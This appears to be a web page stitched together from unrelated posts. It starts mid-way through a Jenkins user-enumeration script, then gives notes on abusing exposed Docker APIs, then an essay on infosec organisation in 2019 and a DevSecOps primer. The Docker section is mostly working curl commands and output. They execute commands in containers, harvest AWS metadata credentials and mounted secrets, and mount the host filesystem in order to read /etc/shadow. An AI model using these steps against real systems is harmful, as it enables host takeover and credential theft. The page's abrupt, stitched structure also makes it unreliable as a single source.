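# The grep pattern is a placeholder; adapt it to the real response HTML.
enum_jenkins_users() {
  local base="$1" letter
  for letter in {a..z}; do
    curl -sk "$(build_search_url "$base" "$letter")" \
      | grep -oE 'user/[A-Za-z0-9_.-]+'
  done | sort -u
}

# Example: enum_jenkins_users http://localhost:8080
```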




Even though the advisory says 2.138.1, I tested against 2.138 and the exploit doesn't work.

SOOOOO you are looking for Jenkins <= 2.137

If Jenkins is really old, the above should work, and you can also get the email address via a similar query:
  • versions up to (including) 2.73.1
  • versions up to (including) 2.83

With 2.137 you can get the username/id:


Abusing Docker API | Socket

Notes on abusing open Docker sockets

This won't cover breaking out of docker containers.

Ports: usually 2375 (plaintext) & 2376 (TLS), but can be anything


Enable docker socket (Create practice locations)

Having the docker API/socket exposed essentially grants root over any of the containers on the system (and, via host mounts, the host itself) to anyone who can reach it.

The daemon listens on unix:///var/run/docker.sock but you can bind Docker to another host/port or a Unix socket.
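If you want a practice target, a deliberately insecure way to add a TCP listener alongside the default unix socket looks like the sketch below. Lab only; never expose a real daemon like this:

```shell
# Lab only: run the daemon by hand with both a unix socket and a TCP listener
dockerd -H unix:///var/run/docker.sock -H tcp://0.0.0.0:2375

# Or persist it via /etc/docker/daemon.json (if Docker is managed by
# systemd, remove any -H flags from the service unit first to avoid a
# conflict with the config file):
# {
#   "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
# }
```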

The docker socket is the socket the Docker daemon listens on by default, and it can be used to communicate with the daemon from within a container or, if configured, from outside the container against the host running docker.

All the docker socket magic happens via the docker API. For example, if we wanted to spin up an nginx container, we'd do the below:

Create a nginx container

The following command uses curl to send the {"Image":"nginx"} payload to the /containers/create endpoint of the Docker daemon through the unix socket. This will create a container based on nginx and return its ID.

$ curl -XPOST --unix-socket /var/run/docker.sock -d '{"Image":"nginx"}' -H 'Content-Type: application/json' http://localhost/containers/create


Start the container

 $ curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/fcb65c6147efb862d5ea3a2ef20e793c52f0fafa3eb04e4292cb4784c5777d65/start

As mentioned above you can also have the docker socket listen on a TCP port

You can validate it's docker by hitting it with a version request

 $ curl -s http://open.docker.socket:2375/version | jq


{
  "Version": "1.13.1",
  "ApiVersion": "1.26",
  "MinAPIVersion": "1.12",
  "GitCommit": "07f3374/1.13.1",
  "GoVersion": "go1.9.4",
  "Os": "linux",
  "Arch": "amd64",
  "KernelVersion": "3.10.0-514.26.2.el7.x86_64",
  "BuildTime": "2018-12-07T16:13:51.683697055+00:00",
  "PkgVersion": "docker-1.13.1-88.git07f3374.el7.centos.x86_64"
}

Or with the docker client:

docker -H open.docker.socket:2375 version


  Version:          1.13.1
  API version:      1.26 (minimum version 1.12)
  Go version:       go1.9.4
  Git commit:       07f3374/1.13.1
  Built:            Fri Dec  7 16:13:51 2018
  OS/Arch:          linux/amd64
  Experimental:     false

This is basically a shell into the container

Get a list of running containers with the ps command

docker -H  open.docker.socket:2375 ps

CONTAINER ID        IMAGE                                               COMMAND                  CREATED             STATUS              PORTS                                           NAMES

72cd30d28e5c        gogs/gogs                                           "/app/gogs/docker/st…"   5 days ago          Up 5 days >3000/tcp,>22/tcp   gogs
b522a9034b30        jdk1.8                                              "/bin/bash"              5 days ago          Up 5 days                                                           myjdk8
0f5947860c17        centos/mysql-57-centos7                             "container-entrypoin…"   8 days ago          Up 8 days >3306/tcp                          mysql
3965c004c7a7   "java -jar /app.jar"     8 days ago          Up 8 days >12000/tcp                        config
3f466b754971        42cb59080921                                        "/bin/bash"              8 days ago          Up 8 days                                                           jdk8
6499013fdc2d        registry                                            "/ /etc…"   8 days ago          Up 8 days >5000/tcp                          registry

Exec into one of the containers

docker -H  open.docker.socket:2375 exec -it mysql /bin/bash

bash-4.2$ whoami


Other commands

Are there some stopped containers?
docker -H open.docker.socket:2375 ps -a

What are the images pulled on the host machine?
docker -H open.docker.socket:2375 images

I've frequently not been able to get the docker client to work well when it comes to the exec command, but you can still exec code in the container with the API. The examples below use curl to interact with the API over HTTPS (if enabled): create an exec job, then start the exec so you can get the output.

Using curl to hit the API

Sometimes you'll see 2376 up for the TLS endpoint. I haven't been able to connect to it with the docker client, but you can hit the docker API with curl no problem.
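The two-step create-exec/start-exec flow used throughout the rest of this post can be wrapped in a small helper. This is just a sketch gluing together the same two curl calls shown later: the hostname and container name are placeholders, and the crude sed-based parsing assumes the create call returns JSON containing an "Id" field.

```shell
# Build the JSON body for a container exec; the command runs under /bin/sh -c.
build_exec_payload() {
  printf '{"AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"Cmd":["/bin/sh","-c","%s"]}' "$1"
}

# Two-step exec against an exposed Docker API: create the exec instance,
# pull its Id out of the response, then start it to receive the output.
docker_api_exec() {
  local host="$1" container="$2" cmd="$3" exec_id
  exec_id=$(curl -sk -X POST -H 'Content-Type: application/json' \
      "${host}/containers/${container}/exec" -d "$(build_exec_payload "$cmd")" \
    | sed -n 's/.*"Id":"\([^"]*\)".*/\1/p')
  curl -sk -X POST -H 'Content-Type: application/json' \
    "${host}/exec/${exec_id}/start" -d '{}'
}

# Example: docker_api_exec https://tls-opendocker.socket:2376 mysql id
```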

Docker socket to metadata URL

Below is an example of hitting the internal AWS metadata URL and getting the output

list containers:

curl --insecure https://tls-opendocker.socket:2376/containers/json | jq
    "Id": "f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668",
    "Names": [
    "Image": "dotnetify",
    "ImageID": "sha256:23b66a91f928ea6a49bce1be4eabedbafd41c5dfa4e76c1a94062590e54550ca",
    "Command": "cmd /S /C 'dotnet netify-temp.dll'",
    "Created": 1541018555,
    "Ports": [
        "IP": "",
        "PrivatePort": 443,
        "PublicPort": 50278,

List processes in a container:

curl --insecure https://tls-opendocker.socket:2376/containers/f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668/top | jq

  "Processes": [

Set up an exec job to hit the metadata URL:

curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/blissful_engelbart/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "wget -qO-"]}'


Get the output:

curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/4353567ff39966c4d231e936ffe612dbb06e1b7dd68a676ae1f0a9c9c0662d55/start -d '{}'


{
  "Code" : "Success",
  "LastUpdated" : "2019-01-29T20:12:58Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIATRSNIP",
  "SecretAccessKey" : "CD6/h/egYHmYUSNIPSNIPSNIPSNIPSNIP",
  "Expiration" : "2019-01-30T02:43:34Z"
}

 Docker secrets
 relevant reading

 list secrets (no secrets/swarm not set up)

 curl -s --insecure https://tls-opendocker.socket:2376/secrets | jq

 { "message": "This node is not a swarm manager. Use \"docker swarm init\" or \"docker swarm join\" to connect this node to swarm and try again."}

 list secrets (they exist)

 $ curl -s --insecure https://tls-opendocker.socket:2376/secrets | jq
    "ID": "9h3useaicj3tr465ejg2koud5",
    "Version": {
      "Index": 21

    "CreatedAt": "2018-07-06T10:19:50.677702428Z",

    "UpdatedAt": "2018-07-06T10:19:50.677702428Z",
    "Spec": {
      "Name": "registry-key.key",
      "Labels": {} }},

Check what is mounted

curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "mount"]}'


Get the output by starting the exec

curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/7fe5c7d9c2c56c2b2e6c6a1efe1c757a6da1cd045d9b328ea9512101f72e43aa/start -d '{}'

overlay on / type overlay 

proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
sysfs on /sys type sysfs (ro,nosuid,nodev,noexec,relatime)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
/dev/sda2 on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/sda2 on /etc/hostname type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/sda2 on /etc/hosts type ext4 (rw,relatime,errors=remount-ro,data=ordered)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)
/dev/sda2 on /var/lib/registry type ext4 (rw,relatime,errors=remount-ro,data=ordered)
tmpfs on /run/secrets/registry-cert.crt type tmpfs (ro,relatime)
tmpfs on /run/secrets/htpasswd type tmpfs (ro,relatime)
tmpfs on /run/secrets/registry-key.key type tmpfs (ro,relatime)

Cat the mounted secret

curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /run/secrets/registry-key.key"]}'


 curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/3a11aeaf81b7f343e7f4ddabb409ad1eb6024141a2cfd409e5e56b4f221a7c30/start -d '{}'



If you have secrets, it's also worth checking out services in case they are adding secrets via environment variables

 curl -s --insecure https://tls-opendocker.socket:2376/services | jq


    "ID": "amxjs243dzmlc8vgukxdsx57y",
    "Version": {
      "Index": 6417
    "CreatedAt": "2018-04-16T19:51:20.489851317Z",
    "UpdatedAt": "2018-12-07T13:44:36.6869673Z",
    "Spec": {
      "Name": "app_REMOVED",
      "Labels": {},
      "TaskTemplate": {
        "ContainerSpec": {
          "Image": "dpage/pgadmin4:latest@sha256:5b8631d35db5514d173ad2051e6fc6761b4be6c666105f968894509c5255c739",
          "Env": [
          "Isolation": "default"

Creating a container that mounts the host file system

curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/create?name=test -d '{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true}'


curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/start?name=test

Read something from the host

curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /mnt/etc/shadow"]}'


curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/140e09471b157aa222a5c8783028524540ab5a55713cbfcb195e6d5e9d8079c6/start -d '{}'




Stop the container

curl --insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/stop

Delete stopped containers

curl --insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/prune

Business Must Change: InfoSec in 2019

I don't know about you, but I am happy to see 2018 ended. Personally, it was a very difficult year, capping a very difficult decade. Now, as we embark into 2019, it's time to sit up and realize that we've now been in this world of e-commerce for more than 20 years (yes, really!). Many, many, many things have changed dramatically over that time, whether it be electronics (smartphones!) or communication (social media!) or transportation (electric vehicles!). However, one thing that really has not changed much is how businesses function, which is really quite sad if you think about it.

There is tons of research and evidence that shows we're now clearly within the 4th industrial age. We all know about the 1st and 2nd industrial revolutions, with the first lasting about 100 years and ending around WWI, and the second being slightly shorter and ending around the end of WWII, but many people don't realize that the 3rd age - of analog-digital transformation, mechanical automation, and industrial transformation - occurred up until sometime in the 1980s or 1990s (dividing lines are always fuzzy with such things). That said, there was definitely a watershed moment in the mid-1990s marking a clear transition from the old Deming-era industrial ways to this modern digital era.

That brings us to 2019... and the imperative for drastic changes across the board, and in particular with how businesses are structured and function (vs. the current dysfunction). More importantly, these changes are also necessary if we have any hope of fixing our organizations to be more secure and to quit hemorrhaging cash at alarming rates, whether it be from massive breaches or insane spending on pointless tools or simply just being wasteful. Here's what I believe needs to happen ASAP, and is especially important in this fragile and declining (American) economy:

1) Flat, Agile, Lean, Empowered, Generative

First and foremost, organizations need to reinvent themselves. I'm a huge proponent of Frédéric Laloux's Reinventing Organizations, in which he talks about a better way to structure and manage. Specifically, he advocates for a flatter structure in which people are empowered to make decisions and take actions in the best interests of the whole. No, this does not mean outright anarchy and chaos, but instead advocates for nurturing a caretaker attitude within all employees such that they truly care. This is a very difficult thing to do! Especially for large enterprises, can you imagine a culture-shift that makes people care about the org and the missions and the products/services being created/provided? Daunting, to say the least.

One of the ways to get there, however, is to start adopting practices from Agile and Lean and start applying them to business management. Small teams should operate in a manner that is reasonably autonomous and empowered. You're asking people to do a task, so let them do it! However, what they do should be within a framework that emphasizes the greater good, lean principles (like eliminating waste), and - most importantly - thinking about generativity (that is, the lasting impact and sustainability of the work for and on future generations). I would submit that this seemingly small (but not trivial) change in management can have HUGE impact overall, including on the security of the organization.

Consider, if you will, that fundamentally we in infosec want people to make better decisions. Truly, that's at the core of much that we do. Those "better decisions" might equate to not falling for (spear)phishing attacks, choosing hardened environments over default installs, or following reasonable secure coding practices in the development process (to name a few). However, when people are empowered to make their own decisions and are held accountable for the lasting impact, then and only then will they start adopting more of a caretaker mentality and start considering long-term impacts. BUT!!! - and this is very important - it also means breaking from the micromanagement techniques that have become so prevalent in business over the past 20 years. Because so much work is intangible (not physical products being produced), it is vastly more difficult to monitor and manage for quality. As such, part of this reinvention of business operations is to completely throw away factory-style TQM practices (including those created by Deming) in favor of digital-style TQM practices that better measure modern-day business functions and outputs. Ergo, what seems so small is in no way trivial or easy.

2) DevOps, Automation, and Outsourcing

This conversation naturally brings us to the DevOps movement, which is singularly the most important "invention" of the past decade. It provides a roadmap for how organizations should function overall. Key within DevOps is the notion of automation, but also equally important is the notion of outsourcing, whether that be to cloud providers or consultants/specialists or other "*-as-a-Service" providers (e.g., mainframes-as-a-service). No matter how you look at it, DevOps is the way that business should operate, and that is - interestingly enough - exactly matched to the org management model that Laloux describes (without ever getting into technology or DevOps!).

First and foremost, let's talk about what DevOps is: it's a cultural movement designed to fundamentally alter how business functions. It is not just about agile or automation or tools/toolchains or anything so simple or crass. It is a broad-scale change in business model and operation; and, it applies to everyone! Know what else parallels this target audience of *everyone*? That's right, it's infosec. Further, just as DevOps advocates applying agile and lean principles (among other things) to business operations, so does infosec advocate applying better security and risk mgmt principles to everything in the organization, too. How do you get people to make better decisions? You educate them, you help them optimize their flow, you provide timely and relevant feedback (preferably as quickly as possible), and you structure in resilience such that when failures happen (they will), they don't bring down the entire organization. Those are the Three Ways of DevOps as introduced within The Phoenix Project way back in 2013.

From a functional perspective, this means a few very specific things for infosec: 1) We must continue to work in a collaborative and consultative manner with everyone else in the organization. 2) We must heavily emphasize ways to automate much of what we're doing to minimize the overhead and functional impact on business operations while trying to achieve our desired goals (e.g., through federated identity with MFA, through deployment of SOAR tools to automate much of otherwise-wasteful SOC practices, through extensive process automation around all forms of access control/mgmt). 3) Similarly, we should continually push decision-makers within projects to ask, first and foremost, the "build or buy?" question, with an emphasis on outsourcing where possible. Our architectures should be built around APIs, integrations, and interoperability such that we avoid vendor lock-in as much as possible, have data portability (or, perhaps more accurately, application portability while we retain control to our own data), and find ways to optimize security and business by leveraging and integrating specialized resources.

3) InfoSec Bifurcation: Functional vs. Strategic

All of this discussion then brings us to a core challenge: we must change how infosec is structured, operates, and performs. Going forward, it's essential to bifurcate infosec between functional and strategic roles. Most functional roles should be directly embedded within technical teams, and should emphasize use of specialized resources. For example, we should not see large infosec/CISO organizations any more, but instead should see functional technical security resources, such as firewall engineers and appsec engineers, directly embedded into their closest related teams (e.g., network teams, dev/DevOps teams, etc.). Functional roles are specialists who are expert at particular operations.

To this end, we need to get away from these "everything but the kitchen sink" roles, whether they be called "security managers" or "security architects" or "DevSecOps engineers." These titles have become so buzzword-overloaded as to be completely meaningless! I have interviewed extensively over the past year+, and the one universal principle is that organizations are trying to find one magical, perfect hire with expert-level experience in anything and everything, which is just patently wrong and stupid and mythological. If you think you need someone who is expert in infosec AND development AND systems AND automation AND incident response AND AND AND... just stop. Please. You're seeking the impossible, setting yourself up for failure and disappointment, and - more importantly - you're causing pain (for yourself and others). Focus on the true functional requirements needed and go hire for that. Nobody can do it all (certainly not well), and there is incredible value in hiring a diverse set of personnel, whether they be FTEs or - far more likely these days - contractors. In fact, I would even go so far as to challenge people to stop thinking about full-time resources for all these functional roles, and instead think about DevOps and the gig culture and how to grab specialist contract resources as needed to perform project work and then move on. Truly, change your thinking and divert from the old, broken models.

Lastly, do invest in strategic resources. For example, a true security architect will have a broad background, strength of vision, and the ability to run an entire project from start to finish (including: problem definition, solution identification and evaluation, solution testing/POC, and solution deployment). Managers and executives should also be strategic overall, focusing on ways to ensure that everything is agile, everything is lean (waste-reducing), and not micromanaging anything. For example, instead of riding a project hard to drive to completion, instead ask "Why is this project spec'd to take so long?" or "What are the obstacles to progress, completion, and success?" When looking at projects strategically, you will then find that you are instead looking at ways of working, how to be more agile, how to be more efficient and effective, and overall how to help empower people to work smarter. It's amazing the difference when you let people do their jobs and focus instead on helping them achieve their goals. Also, in doing this, it allows management ranks to thin and flatten, fewer managers can manage more projects and personnel, and so on. For infosec, this means finding and developing leaders and - of equal importance - not forcing people to leave their specialty behind simply to "move up the ranks." There shouldn't be ranks so much as effective leadership and the division between strategic and functional actors. Making this change will further the first two points above in reforming how the organization operates, while also allowing infosec progress to truly be made in a reformational manner.

I hope to write in more depth about all of these points in the coming weeks and months. First things first, though: I need a steady source of income! Yes, 2018 was rough, and it ended just as it had been going all along: on a major note of disappointment. But... a new year means the opportunity to turn the page, find something better. In the meantime, please take this message out to everyone and let's see if we can finally hit a tipping point in how businesses function and finally instigate meaningful change.

Cheers & Happy New Year!

DevSecOps is coming! Don’t be afraid of change.


There has been a lot of buzz about the relationship between Security and DevOps, as if we are debating their happy companionship. To me they are soulmates, and DevSecOps is a workable, scalable, and quantifiable fact, not a magic button, if applied wisely.

What is DevOps?

The development cycle has undergone considerable changes in the last few years. Customers and clients have evolving requirements, and the market demands speed and quality. The relationship between developers and operations has grown much closer to address this change. IT infrastructure has evolved in parallel to cater to quick timelines and release cycles. The old legacy infrastructure with multiple toll gates is drifting away, and fast, responsive APIs are taking its place to spawn and scale vast instances of software and hardware.

Developers, who were slowly getting closer to the operations team, have now decided to wear both hats and skip a 'redundant' hop. This integration has helped organisations achieve quick releases with better application stability and response times. Now, the demands of the customer or end-user can be addressed and delivered directly by the DevOps team. Sometimes people confuse agile and DevOps, and it's natural with the ever-changing landscape.

Simply put, Agile is a methodology and is about processes (scrums, sprints, etc.), while DevOps is about technical integration (CI/CD, tooling, and IT automation).

While Agile talks about the SDLC, DevOps also integrates Operations and fluidity into Agile. It focuses on being closer to the customer, not just committing working software. DevOps has in its arsenal many tools that support release, monitoring, management, virtualisation, automation, and orchestration, making the different parts of delivery fast and efficient. It's the need of the hour with the constant changes in requirements and ecosystem. It has to evolve and release ongoing updates to keep up with the pace of the customer and market demands. It's not a mono-directional water flow; instead, it's like an omnidirectional tube of water flowing in a gravity-free ecosystem.

What is DevSecOps?

The primary objective of DevSecOps is to integrate security at the early stages of development on the process side and to make sure everyone in the team is responsible for security. It evangelises security as a strong glue that holds the bond between development and operations, as a single task force. In DevSecOps, security ought to be a part of automation via tools, controls, and processes.

Traditional SDLC (software development life cycle) often perceives security as a toll gate at the end, to validate the efforts on the scale of visible threats. In DevSecOps, security is everywhere, at all stages/phases of development and operations. It is embedded right into the life cycle, with continuous integration between the drawing pad, security tools, and release cycle.

As Gartner documents, DevSecOps can be depicted graphically as the rapid and agile iteration from development into operations, with continuous monitoring and analytics at the core.


Another key driving factor for DevSecOps is the fact that perimeter security is failing to adjust to increasing integration points and the blurring of trust boundaries. It's getting less clear and fuzzier where the perimeter is in this cyber ecosystem. It is evident that software has to be inherently secure itself without relying on border security controls. Rapid development and releases shorten the supply chain timeline for implementing custom controls like filters, policies and firewalls.

I have tried to make the terms well understood in this series; there are many challenges faced by organizations, and possible solutions, which I shall cover in the next article.
Stay tuned.